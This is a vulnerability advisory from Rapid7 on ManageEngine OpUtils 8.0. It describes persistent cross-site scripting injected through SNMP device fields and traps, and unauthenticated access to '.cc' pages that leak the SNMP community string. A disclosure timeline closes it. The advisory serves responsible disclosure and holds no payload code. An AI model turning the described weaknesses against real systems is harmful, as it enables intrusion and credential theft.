ManageEngine OpUtils is an enterprise switch port and IP address management system. Rapid7's Deral Heiland discovered a persistent cross-site scripting (XSS) vulnerability, as well as a number of insecure direct object references. The vendor and CERT have been notified of these issues. The version tested was OpUtils 8.0, which was the most recent version at the time of initial disclosure. As of today, the current version offered by ManageEngine is OpUtils 12.0.
R7-2016-02.1: Multiple Persistent XSS Vulnerabilities
sysDescr and sysLocation triggered when viewed within IP History as shown in Figure 2 and Figure 3.
Figure 2: sysDescr injected XSS
Figure 3: sysLocation injected XSS
In addition, sysDescr, sysLocation, and sysName triggered when viewed within device history as shown in Figure 4.
Figure 4: sysName injected XSS
Figure 5: XSS Via SNMP Trap Injection
R7-2016-02.2: Multiple Insecure Direct Object References
During testing, it was discovered that URLs ending in .cc are accessible without proper authentication. This allowed for retrieval of a portion of the web page. The following URLs are able to be accessed without authentication:
As a result of this direct access without authentication, an attacker is able to view the HTML of the web page “SystemExplorer.cc.” Here, it was discovered that the product's configured SNMP community string is transmitted in clear text as shown in Figure 6.
Figure 6: Information leakage via Insecure Direct Object Reference
Thu, Jan 14, 2016: Issues discovered by Deral Heiland of Rapid7, Inc.
Fri, Jan 15, 2016: Initial contact to vendor
Mon, Feb 15, 2016: Details disclosed to CERT, tracked as VU#400736
Wed, Mar 9, 2016: Clarification requested by the vendor, via CERT
Thu, Mar 17, 2016: Public disclosure of R7-2016-02